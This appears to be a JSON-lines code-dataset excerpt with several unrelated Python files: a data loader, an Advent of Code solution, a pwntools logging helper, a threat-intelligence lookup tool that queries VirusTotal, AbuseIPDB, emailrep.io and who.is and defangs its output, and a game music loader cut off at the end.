encoding='utf_8_sig', mode='a', index=False, header=False)\n pass\n else:\n df.to_csv('./girl.csv', encoding='utf_8_sig')\n","repo_name":"klmmlk/ouchn","sub_path":"getMM.py","file_name":"getMM.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34777776747","text":"import pandas as pd\n\n#%%\n\nclass Agriculture:\n \n \"\"\"\n \"\"\"\n \n def __init__ (self, data_path_prefix):\n \n self.data_path_prefix = data_path_prefix\n self.f_name = 'Agriculture.csv'\n \n # data loading \n self.agg = pd.read_excel(self.data_path_prefix + '\\\\' + self.f_name, header = 3)\n \n # unit conversion\n \n\nif __name__ == '__main__':\n \n # Please change the path to data folder per your computer\n input_path_prefix = 'C:\\\\Users\\\\skar\\\\Box\\\\EERE SA Decarbonization\\\\1. Tool\\EERE Tool\\\\Data\\\\Script_data_model\\\\1_input_files'\n input_path_aggriculture = input_path_prefix + '\\\\Agriculture'\n \n ob1 = Agriculture(input_path_aggriculture)\n \n print(ob1.agg)","repo_name":"Argonne-National-Laboratory-SAC/DECARB","sub_path":"Agriculture_import.py","file_name":"Agriculture_import.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36458359496","text":"import numpy as np\n\nwith open(\"input_day2.txt\") as f:\n text = f.read()\n\ninstructions = [a for a in text.splitlines()]\n\nhorizontal = 0\ndepth = 0\naim = 0\n\nfor i in instructions:\n commands = i.split(' ')\n word = commands[0]\n distance = int(commands[1])\n if (word[0].startswith('d')):\n aim = aim + distance\n\n elif (word[0].startswith('u')):\n aim = aim - distance\n\n else:\n horizontal = horizontal + distance\n depth = depth + aim * distance\n\nprint(horizontal)\nprint(depth)\nprint(horizontal * depth)\n","repo_name":"s-cooper18/advent-of-code-2021","sub_path":"day2_2.py","file_name":"day2_2.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23536352762","text":"from pwn import *\n\n#def lg(name,addr):\n# log.info(f'{name} -> {addr}')\n#lg(stack,666)\n\ndef lg(*args):\n if len(args) >= 2:\n name = args[0]\n addr = args[1]\n log.info(f'{name} -> {addr}')\n else:\n log.error(\"Insufficient arguments\")\n\nlg(stack, 0x666)\n\n","repo_name":"xiaofeng789/fmt","sub_path":"xmfmt/playfmt/exp66.py","file_name":"exp66.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7960125721","text":"about = '''\nCYBV473 - Violent Python \nDate: 12/12/2020\nFinal Project - SOC Analysis Version 1\n\nThis final project is a multithreading tool to help security \nanalysts to identify a hash, email, IP or URL with a bad \nreputation by automatically querying it into different databases. \n\nCurrent Supported Databases:\n\nhttps://www.virustotal.com/\nhttps://who.is/\nhttps://www.abuseipdb.com/\nhttps://emailrep.io/\n\nThis tool can be used as a GUI (-g), or in a CLI (-q -e ).\n'''\ntest_strings= '''\n======== Test strings: ======= \n\n~~~~~~~\nBad Reputation IP: 45.154.168.201\nGood Reputation IP: 69.63.176.13 (Facebook)\n~~~~~~~\nBad Reputation Hash: b8458d393443ca9b59f4d32a5d31e4f7 (hotpotato.exe privesc hash)\nGood Reputation Hash: 2ee1c17ba0344e6e58c572f52660d1f3 (Internet Explorer)\n~~~~~~~\nGood Reputation url: www.facebook.com\n~~~~~~~\n'''\n\nimport tkinter as tk\nimport tkinter.scrolledtext as scrolledtext\nfrom tkinter import messagebox\n\nimport argparse\nimport requests\nimport json\nfrom prettytable import PrettyTable\nfrom threading import Thread\n\n# API Keys that I use through the code. Usually I would put those in a separate .conf file.\n\nvirusTotal_API = \"\"\nabuseipdb_API = \"\"\nemailRepio_API = \"\"\n\nproject = '''\n=====================================================\n _______ ________ ___ _ ______ ____ \n / ____\\ \\ / | _ \\ \\ / | || |____ |___ \\ \n | | \\ \\_/ /| |_) \\ \\ / /| || |_ / / __) |\n | | \\ / | _ < \\ \\/ / |__ _|/ / |__ < \n | |____ | | | |_) | \\ / | | / / ___) |\n \\_____| |_________/ \\/ __|/_/ |____/ \n | ____(_) | | \n | |__ _ _ __ __ _| | \n | __| | | '_ \\ / _` | | \n | | | | | | | (_| | | \n |_| |_|_| |_|\\__,_|_| \n=====================================================\n'''\n\nprint(project)\n\n'''\nFunction to check email reputation\nThis will query the database https://emailrep.io/, send the \nstring, parse the results, input the results into a table, \nand print the table to the user.\n'''\ndef emailrep(query_string,results_box):\n scan_title = \"\\n\\n==========> Emailrep.io Results: <==========\\n\\n\" \n value = string_type(query_string)\n report = \"\"\n if value == 'email':\n try:\n url = 'https://emailrep.io/' + query_string + '?summary=true'\n params = {'Key': emailRepio_API, 'User-Agent': \"CYBV473-Final\"} \n response = requests.get(url, params=params)\n \n req = response.json()\n emailDomain = query_string.split('@')[1]\n \n email_tbl = PrettyTable()\n domain_tbl = PrettyTable()\n malicious_tbl = PrettyTable()\n \n email_tbl.field_names = [\"Data\", \"Result\"]\n domain_tbl.field_names = [\"Data\", \"Result\"]\n malicious_tbl.field_names = [\"Data\", \"Result\"]\n \n email_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n domain_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n malicious_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n \n if response.status_code == 400:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Invalid Email / Bad Request')\n else:\n print(scan_title)\n print('Invalid Email / Bad Request')\n return 0\n \n if response.status_code == 429:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Too many requests (Free API - 10/day)')\n else:\n print(scan_title)\n print('Too many requests (Free API - 10/day)') \n return 0\n \n if response.status_code == 200: \n \n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n if req['suspicious'] == True:\n report += \"The email appears to be suspicious.\"\n else:\n report += \"The email does not appear to be suspicious.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n \n email_tbl.add_row([\"Email\", req['email']])\n email_tbl.add_row([\"Reputation\", req['reputation']])\n email_tbl.add_row([\"Suspicious\", req['suspicious']])\n email_tbl.add_row([\"Spotted\", str(req['references']) + ' Times'])\n email_tbl.add_row([\"Blacklisted\", req['details']['blacklisted']])\n email_tbl.add_row([\"Last Seen\", req['details']['last_seen']])\n email_tbl.add_row([\"Known Spam\", req['details']['spam'] ])\n \n malicious_tbl.add_row([\"Malicious Activity::\", req['details']['malicious_activity'] ])\n malicious_tbl.add_row([\"Recent Activity::\", req['details']['malicious_activity_recent'] ])\n malicious_tbl.add_row([\"Credentials Leaked:\", req['details']['credentials_leaked'] ])\n malicious_tbl.add_row([\"Found in breach:\", req['details']['data_breach'] ])\n \n domain_tbl.add_row([\"Domain\", emailDomain ])\n domain_tbl.add_row([\"Domain Exists:\", req['details']['domain_exists'] ])\n domain_tbl.add_row([\"Domain Rep:\", req['details']['domain_reputation'] ])\n domain_tbl.add_row([\"Domain Age:\", str(req['details']['days_since_domain_creation']) + ' Days' ])\n domain_tbl.add_row([\"New Domain:\", req['details']['new_domain'] ])\n domain_tbl.add_row([\"Deliverable:\", req['details']['deliverable'] ])\n domain_tbl.add_row([\"Free Provider:\", req['details']['free_provider'] ])\n domain_tbl.add_row([\"Disposable:\", req['details']['disposable'] ])\n domain_tbl.add_row([\"Spoofable:\", req['details']['spoofable'] ])\n\n except:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, 'Error accessing https://emailrep.io/')\n else:\n print(scan_title)\n print('Error accessing https://emailrep.io/') \n \n email_tbl.align = \"l\" \n domain_tbl.align = \"l\" \n malicious_tbl.align = \"l\" \n \n email_String = email_tbl.get_string()\n domain_String = domain_tbl.get_string()\n malicious_String = malicious_tbl.get_string()\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,report + \"\\n\")\n results_box.insert(tk.END,'\\n Email Analysis Report\\n')\n results_box.insert(tk.END, email_String)\n results_box.insert(tk.END,'\\n Domain Report\\n')\n results_box.insert(tk.END, domain_String)\n results_box.insert(tk.END,'\\n Malicious Activity Report\\n')\n results_box.insert(tk.END, malicious_String)\n \n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report)\n print('\\n Email Analysis Report\\n')\n print(email_String)\n print('\\n Domain Report\\n')\n print(domain_String)\n print('\\n Malicious Activity Report\\n')\n print(malicious_String)\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + 'Value does not appear to be a valid email')\n else:\n print(scan_title)\n print('Value does not appear to be a valid email') \n\n\n\n\n'''\nFunction to check the whois database\nThis will query the database https://who.is/, send the\nstring, parse the HTML results and return the results to the user.\nI attempted to parse the HTML code without the use of any other \nthird_party libraries. Next Version I should use the Beautifulsoup library. \n\n'''\ndef whois_Lookup(query_string,results_box):\n scan_title = \"\\n\\n==========> Who.is Information: <==========\\n\\n\" \n value = string_type(query_string)\n report = \"\"\n \n registrar_tbl = PrettyTable()\n name_servers_tbl = PrettyTable()\n similar_domains_tbl = PrettyTable()\n registrar_data_tbl = PrettyTable()\n \n registrar_tbl.field_names = [\"Data\", \"Result\"]\n name_servers_tbl.field_names = [\"Data\", \"Result\"]\n similar_domains_tbl.field_names = [\"Data\", \"Result\"]\n registrar_data_tbl.field_names = [\"Data\", \"Result\"]\n \n registrar_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n name_servers_tbl._max_width = {\"Data\" : 40, \"Result\" : 40}\n similar_domains_tbl._max_width = {\"Data\" : 40, \"Result\" : 40} \n registrar_data_tbl._max_width = {\"Data\" : 40, \"Result\" : 40} \n \n nomatch = 0\n if value == 'url':\n if '//' in query_string:\n query_string = query_string.split('//')[1]\n url = 'https://who.is/whois/' + query_string\n response = requests.get(url)\n \n if \"No match for\" in response.text:\n nomatch = 1\n else:\n registrar = response.text.split('Name Servers')[0]\n name_servers = response.text.split('Name Servers')[1].split('Similar Domains')[0]\n similar_domains = response.text.split('Name Servers')[1].split('Similar Domains')[1].split('Registrar Data')[0]\n registrar_data = response.text.split('Name Servers')[1].split('Similar Domains')[1].split('Registrar Data')[1]\n \n \n # Registrar Info / Important Dates \n for i in range (len(registrar.split('queryResponseBodyKey'))):\n key = CleanString(registrar.split('queryResponseBodyKey')[i].split('<')[0][2:]) # key\n key_value = CleanString(registrar.split('queryResponseBodyValue\">')[i].split('<')[0]) # value\n registrar_tbl.add_row([key,key_value])\n \n #name servers\n i=1\n while i < (len(name_servers.split('queryResponseBodyValue\">'))):\n key = CleanString(name_servers.split('queryResponseBodyValue\">')[i].split('>')[1].split('<')[0]) # key \n key_value = CleanString(name_servers.split('queryResponseBodyValue\">')[i+1].split('>')[1].split('<')[0]) # value\n name_servers_tbl.add_row([key,key_value])\n i = i + 2\n \n # Similar Domains \n i=1\n while i < (len(similar_domains.split('href'))):\n #similar_domains.split('href')[i].split('>')[1].split('<')[0]\n similar_domains_tbl.add_row(['Similar domain:', CleanString(similar_domains.split('href')[i].split('>')[1].split('<')[0])])\n i = i + 1\n \n #Registrar Data \n i=1\n while i < (len(registrar_data.split('strong'))):\n key = CleanString(registrar_data.split('strong')[i][1:-2]) # key\n key_value = CleanString(registrar_data.split('strong')[i+1].split('>')[3].split('<')[0]) # value\n registrar_data_tbl.add_row([key,key_value])\n i = i + 2\n \n if value == 'ip':\n url = 'https://who.is/whois-ip/ip-address/' + query_string\n response = requests.get(url)\n \n if \"No match for\" in response.text:\n nomatch = 1\n else:\n s = response.text\n \n start = s.find('
') + len('
')\n            end = s.find('
')\n report = s[start:end]\n \n \n registrar_tbl.align = \"l\" \n name_servers_tbl.align = \"l\" \n similar_domains_tbl.align = \"l\" \n registrar_data_tbl.align = \"l\" \n \n if theArgs.gui:\n if value == \"ip\":\n if nomatch == 0:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,CleanString(report))\n else:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, \"IP not found in this database\")\n elif value == 'url':\n if nomatch == 0:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nRegistrar Info\\n\")\n resultString = registrar_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nName Servers\\n\")\n resultString = name_servers_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nSimilar domains\\n\")\n resultString = similar_domains_tbl.get_string() \n results_box.insert(tk.END,resultString)\n results_box.insert(tk.END,\"\\nRegistrar data\\n\")\n resultString = registrar_data_tbl.get_string() \n results_box.insert(tk.END, resultString)\n else:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, \"URL not found in this database\")\n else:\n results_box.insert(tk.END, scan_title + \"The string does not appear to be a ip or url\") \n else:\n if value == \"ip\":\n if nomatch == 0:\n print(scan_title)\n print(report)\n else: \n print(scan_title)\n print(\"IP not found in this database\")\n elif value == 'url':\n if nomatch == 0:\n print(scan_title)\n print(\"Registrar Info\")\n resultString = registrar_tbl.get_string() \n print(resultString)\n print(\"Name servers\")\n resultString = name_servers_tbl.get_string() \n print(resultString)\n print(\"Similar domains\")\n resultString = similar_domains_tbl.get_string() \n print(resultString)\n print(\"Registrar data\")\n resultString = registrar_data_tbl.get_string() \n print(resultString)\n else:\n print(scan_title)\n print(\"URL not found in this database\")\n else:\n print(scan_title)\n print(\"The string does not appear to be a ip or url\") \n \n\n\n'''\nFunction to check the VirusTotal database:\nThis will query the database https://www.virustotal.com/, send the\nstring, depending on the type of string (url,hash or ip), the code \nparses the result and return to the user accordingly.\n'''\ndef virustotal(query_string,results_box):\n scan_title = \"\\n\\n==========> Virustotal Results: <==========\\n\\n\" \n report = \"\"\n\n value = string_type(query_string)\n \n if (value == \"ip\"):\n url = 'https://www.virustotal.com/vtapi/v2/ip-address/report'\n params = {'apikey': virusTotal_API, 'ip': query_string}\n response = requests.get(url, params=params)\n if response.status_code == 200: \n if 'IP address in dataset' in response.json()['verbose_msg']:\n try:\n report += \"Owner: \" + CleanString(response.json()['as_owner']) + \"\\n\"\n except:\n pass\n report += \"\\nPassive DNS Replication:\\n\"\n for i in range(0,len(response.json()['resolutions'])):\n report += \" \" + CleanString(response.json()['resolutions'][i]['hostname']) + \"\\n\"\n \n # trying to to get url reputation\n url = 'https://www.virustotal.com/vtapi/v2/url/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params)\n report += \"\\n\"\n report += \"Detected as Malicious by: \" + str(response.json()['positives']) + \" engines\\n\"\n report += \"Total number of engines: \" + str(response.json()['total'])\n \n else:\n report += \"The IP does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4)\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + response.status_code) \n \n \n elif (value == \"url\"): \n url = 'https://www.virustotal.com/vtapi/v2/url/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params) \n if response.status_code == 200: \n result = response.json()\n \n if 'The requested resource is not among the finished, queued or pending scans' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n elif 'Resource does not exist in the dataset' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n elif 'Invalid resource, check what you are submitting' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"Invalid resource, check what you are submitting.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n \n else:\n list_a = result['scans'].keys()\n detected = 0 \n tbl = PrettyTable()\n tbl.field_names = [\"Engine\", \"Result\", \"Detected\"]\n \n for i in list_a:\n tbl.add_row([i, result['scans'][i]['result'], result['scans'][i]['detected']])\n if result['scans'][i]['detected'] == True:\n detected = detected + 1\n \n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The URL was detected as malicious by \" + str(detected) + \" out of \" + str(len(list_a)) + \" engines\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n'\n report += \"Full Report:\\n\\n\"\n \n tbl.align = \"l\" \n tbl.sortby = \"Detected\"\n tbl.reversesort = True\n resultString = tbl.get_string()\n \n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, resultString)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n print(resultString) \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + response.status_code) \n \n elif (value == \"hash\"):\n url = 'https://www.virustotal.com/vtapi/v2/file/report'\n params = {'apikey': virusTotal_API, 'resource': query_string}\n response = requests.get(url, params=params)\n\n if response.status_code == 200: \n result = response.json()\n \n if 'The requested resource is not among the finished, queued or pending scans' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The hash does not appear to be part of VirusTotal database.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4)\n \n if 'Invalid resource, check what you are submitting' in result['verbose_msg']:\n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"Invalid resource, check what you are submitting.\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~\\n'\n report += 'Full Report: '\n report += json.dumps(response, sort_keys=False, indent=4) \n \n else:\n list_a = result['scans'].keys()\n detected = 0 \n tbl = PrettyTable()\n tbl.field_names = [\"Engine\", \"Result\", \"Detected\", \"Updated\"]\n tbl._max_width = {\"Engine\" : 20, \"Result\" : 20, \"Detected\" : 20 , \"Updated\" : 20}\n \n for i in list_a:\n tmpdate = result['scans'][i]['update']\n tbl.add_row([i, result['scans'][i]['result'], result['scans'][i]['detected'], tmpdate[4:6] + '-' + tmpdate[6:8] + '-' + tmpdate[0:4]])\n if result['scans'][i]['detected'] == True:\n detected = detected + 1\n \n report += '~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"The hash was detected as malicious by \" + str(detected) + \" out of \" + str(len(list_a)) + \" engines\"\n report += '\\n~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n report += \"\\nFull Report:\\n\\n\"\n \n tbl.align = \"l\" \n tbl.sortby = \"Detected\"\n tbl.reversesort = True\n resultString = tbl.get_string()\n\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n results_box.insert(tk.END, resultString)\n results_box.insert(tk.END, \"\\n\\n\")\n else:\n print(scan_title)\n print(report) \n print(resultString)\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END,\"\\nError: \" + str(response.status_code))\n else:\n print(\"error: \" + str(response.status_code)) \n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + \"The string does not appear to be a URL, IP or Hash\")\n else:\n print(scan_title)\n print(\"The string does not appear to be a URL, IP or Hash\") \n \n\n\n'''\nFunction to check the abuseipdb database\nThis will query the database https://www.abuseipdb.com/, send the\nstring, the code parses the result and return to the user accordingly.\n'''\ndef abuseipdb(query_string,results_box):\n scan_title = \"\\n\\n==========> AbuseIPDB Results: <==========\\n\\n\"\n report = \"\" \n value = string_type(query_string)\n \n if (value == \"ip\"): \n try:\n \n AB_URL = 'https://api.abuseipdb.com/api/v2/check'\n days = '180'\n querystring = {'ipAddress': query_string,'maxAgeInDays': days}\n headers = {'Accept': 'application/json','Key': abuseipdb_API}\n response = requests.request(method='GET', url=AB_URL, headers=headers, params=querystring)\n \n if response.status_code == 200:\n req = response.json()\n report += \"\\nIP: \" + CleanString(str(req['data']['ipAddress']))\n report += \"\\nReports: \" + CleanString(str(req['data']['totalReports']))\n report += \"\\nAbuse Score: \" + CleanString(str(req['data']['abuseConfidenceScore']) + \"%\")\n report += \"\\nLast Report: \" + CleanString(str(req['data']['lastReportedAt']))\n \n else:\n report += \"Error Reaching ABUSE IPDB\"\n\n if theArgs.gui:\n results_box.insert(tk.END, scan_title)\n results_box.insert(tk.END, report)\n else:\n print(scan_title)\n print(AIPDB_report) \n except:\n report += ' IP Not Found'\n else:\n if theArgs.gui:\n results_box.insert(tk.END, scan_title + 'Value does not appear to be a valid IP')\n else:\n print(scan_title)\n print('Value does not appear to be a valid IP') \n\n\n\n'''\nThis function will check if string being \npassed is a hash, url, ip, or email.\nThis function will be updated in future versions.\n'''\ndef string_type(query_string):\n \n if len(query_string) >= 32: # check the lenght of the string (32 bits = md5) \n value = \"hash\"\n elif query_string.count('.') == 3 and all(0<=int(num)<256 for num in query_string.rstrip().split('.')):\n value = \"ip\"\n elif '@' in query_string:\n value = \"email\"\n elif query_string == '':\n value = \"empty\"\n elif ('http' in query_string) or ('www.' in query_string) or ('.com' in query_string) or ('.edu' in query_string) or ('.org' in query_string):\n value = \"url\" \n else:\n value = 'I dont know what is this.'\n #print(\"String identified as: \" + value)\n return value\n\n\n\n'''\nFunction to clean IP's and URLs. This is \nimportant in a report to avoid clicking on\nmalicious emails or IP's.\n'''\ndef CleanString(string):\n string = string.replace('.','[.]')\n string = string.replace('https://','hxxps://')\n string = string.replace('http://','hxxp://')\n return string\n\n\n\n'''\nFunction that will manage all the searches.\nThis function utilizes threads to execute the database searches. \nThe order that the databases are printed might vary, since there\nare different threads and they might finish at different times.\n\nIf using a graphical interface, this function opens a new window that will hold the results. \nthis is helpful, since depending on the analyst investigation, it might be required to\nsearch for different strings at the same time, for example: email, ip, domain and hash.\n'''\ndef manager(root,query_string,Virustotal_check,AbuseIPDB_check,Emailrep_check,whois_check): \n results_box = \"\"\n if theArgs.gui:\n window = tk.Toplevel(root)\n window.resizable(False, False)\n window.title('Results')\n \n results_box_label = tk.Label(window, text=\"Results for: \" + CleanString(query_string), font=(\"Helvetica 16 bold\"))\n results_box = tk.scrolledtext.ScrolledText(window, height=50, width=80) # Create the TextBox\n closebtn = tk.Button(window, text='Close', command=lambda: window.destroy(), font=(\"Helvetica 16 bold\"), width=20)\n \n results_box_label.grid(row=0, columnspan=2, padx=5, pady=5)\n results_box.grid(row=1, columnspan=2, padx=5, pady=5)\n closebtn.grid(row=2, columnspan=2, padx=5, pady=5)\n \n window.update()\n \n if query_string == \"\":\n if theArgs.gui:\n results_box.insert(tk.END, 'Search string cannot be empty')\n else:\n print(\"Search string cannot be empty\")\n else:\n if whois_check: \n t = Thread(target=whois_Lookup,args=(query_string, results_box,))\n t.start()\n \n if Virustotal_check:\n t = Thread(target=virustotal,args=(query_string, results_box,))\n t.start()\n \n if AbuseIPDB_check:\n t = Thread(target=abuseipdb,args=(query_string, results_box,))\n t.start() \n \n if Emailrep_check:\n t = Thread(target=emailrep,args=(query_string, results_box,))\n t.start()\n \n if (whois_check == False) and (Virustotal_check == False) and (AbuseIPDB_check == False) and (Emailrep_check == False) :\n if theArgs.gui:\n results_box.insert(tk.END, '\\nPlease select at least one Database')\n else:\n print('Please select at least one Database') \n\n \n'''\nThis is the about menu for the graphical interface.\n''' \ndef menuAbout():\n messagebox.showinfo(\"About\", about)\n messagebox.Dialog\n\n\n\n'''\nThis is the how_to menu for the graphical interface.\n''' \ndef menuHow_To():\n messagebox.showinfo(\"How To\", how_to + test_strings)\n messagebox.Dialog\n\n\n\n'''\nGraphical Interface\nThis is a quick graphical interface. It contains a input string box, \ndatabase check boxes and a button to perform the search. when the search\nstarts, it opens a new window that will hold all the results from the search.\n'''\ndef graphicalInterface():\n root = tk.Tk()\n root.title(\"CYBV 473 Final\")\n root.resizable(False, False)\n menuBar = tk.Menu(root)\n toolsMenu = tk.Menu(menuBar, tearoff=0)\n \n \n toolsMenu.add_command(label='About Search', command=menuAbout, underline=0)\n toolsMenu.add_command(label='How To', command=menuHow_To, underline=0)\n toolsMenu.add_separator()\n toolsMenu.add_command(label='Exit', command=root.destroy)\n menuBar.add_cascade(label='Help', menu=toolsMenu, underline=0) \n root.config(menu=menuBar) # menu ends\n \n search_Label = tk.Label(root, text=\"URL, IP, hash or email:\", font=(\"Helvetica 16 bold\"))\n search_String = tk.Entry(root,font=(\"Helvetica 16 bold\"))\n search_Button = tk.Button(root, text='search', command=lambda: manager(root,search_String.get(),Virustotal_check.get(),AbuseIPDB_check.get(),Emailrep_check.get(),whois_check.get()),font=(\"Helvetica 16 bold\"))\n \n # create the checkboxes\n Virustotal_check = tk.BooleanVar() \n Virustotal = tk.Checkbutton(root, text=\"Virustotal\", variable=Virustotal_check)\n \n AbuseIPDB_check = tk.BooleanVar() \n AbuseIPDB = tk.Checkbutton(root, text=\"AbuseIPDB\", variable=AbuseIPDB_check)\n \n Emailrep_check = tk.BooleanVar() \n Emailrep = tk.Checkbutton(root, text=\"Emailrep\", variable=Emailrep_check)\n \n whois_check= tk.BooleanVar() \n whois = tk.Checkbutton(root, text=\"who.is\", variable=whois_check)\n \n search_Label.grid(row=0, columnspan=2, padx=5, pady=5)\n search_String.grid(row=1, columnspan=2, padx=5, pady=5)\n\n Virustotal.grid(row=2, column=0, padx=5, pady=5,sticky=tk.W)\n AbuseIPDB.grid(row=2, column=1, padx=5, pady=5,sticky=tk.W)\n Emailrep.grid(row=3, column=1, padx=5, pady=5,sticky=tk.W)\n whois.grid(row=3, column=0, padx=5, pady=5,sticky=tk.W)\n search_Button.grid(row=5, columnspan=2, padx=5, pady=5) \n \n if theArgs.query:\n search_String.insert(tk.END, theArgs.query)\n tk.mainloop()\n \n\n'''\nMain Function:\n''' \n\nhow_to='This tool checks for hash, ip, url or email reputation.\\n Usage:\\n GUI: \\npython3 SOC_analysis.py -g |\\n CLI: \\npython3 SOC_analysis.py -e whois,virustotal -q www.facebook.com'\n\nparser = argparse.ArgumentParser(description=how_to)\nparser.add_argument('-g', '--gui', help='Use graphical interface', action='store_true')\nparser.add_argument('-e', '--engine', help='Select a search engine (whois, virustotal, abuseipdb or emailrep)')\nparser.add_argument('-q', '--query', help='This needs to be a valid Hash, email, url or IP.')\n\ntheArgs = parser.parse_args()\n \nif theArgs.gui:\n graphicalInterface()\n \nelif theArgs.query:\n if theArgs.engine: \n # manager(root,query_string,Virustotal_check,AbuseIPDB_check,Emailrep_check,whois_check): \n virustotal_temp = False\n abuseipdb_temp = False\n emailrep_temp = False\n whois_temp = False\n \n if 'virustotal' in theArgs.engine:\n virustotal_temp = True\n if 'whois' in theArgs.engine:\n whois_temp = True\n if 'abuseipdb' in theArgs.engine:\n abuseipdb_temp = True\n if 'emailrep' in theArgs.engine:\n emailrep_temp = True\n \n manager(False,theArgs.query,virustotal_temp,abuseipdb_temp,emailrep_temp,whois_temp)\n\n else:\n parser.print_help()\n\nelif theArgs.engine:\n parser.print_help()\n\nelse: \n parser.print_help()\n\n","repo_name":"xhaabx/SOC-Investigate","sub_path":"Final_Analysis.py","file_name":"Final_Analysis.py","file_ext":"py","file_size_in_byte":33285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20130134883","text":"# NOTE: This file is the location for music assets, instead of asstes.py\n# This decision was made in order to reduce clutter in assets.py\n\n\nimport logging\nimport random\nimport os\n\nimport pygame.mixer\n\nfrom tank_game import global_vars, config\n\n\nhave_music = config.ENABLE_MUSIC\n\nif global_vars.use_sound:\n logging.info('Loading music...')\n try:\n\n songs = [\n ('music/Dream_Sweet_in_Sea_Major.ogg', 0.25),\n ('music/The_undergrounds_1.ogg', 0.25),\n ]\n\n toremove = []\n for (song, volume) in songs:\n if not os.path.exists(song):\n logging.warning(f'Music file \"{song}\" does not exist, removing from playlist')\n toremove.append((song, volume))\n else:\n try:\n pygame.mixer.music.load(song)\n except Exception:\n logging.warning(f'Music file \"{song}\" unable to be loaded, removing from playlist', exc_info=True)\n toremove.append((song, volume))\n for rem in toremove:\n songs.remove(rem)\n\n if not songs:\n logging.warning('All songs failed to load! Disabled music for game')\n have_music = False\n\n def play_random_song():\n song, volume = random.choice(songs)\n logging.debug(f'Playing song \"{song}\" at volume {volume}...')\n pygame.mixer.music.load(song)\n pygame.mixer.music.set_volume(volume)\n pygame.mixer.music.play(fade_ms=500)\n\n def stop_music():\n pygame.mixer.music.fadeout(500)\n logging.debug('Stopped music')\n\n except Exception:\n have_music = False\n logging.warning('Error while loading music', exc_info=True)\nelse:\n have_music = False\n\n\nif have_music:\n logging.info('Music loaded!')\nelse:\n 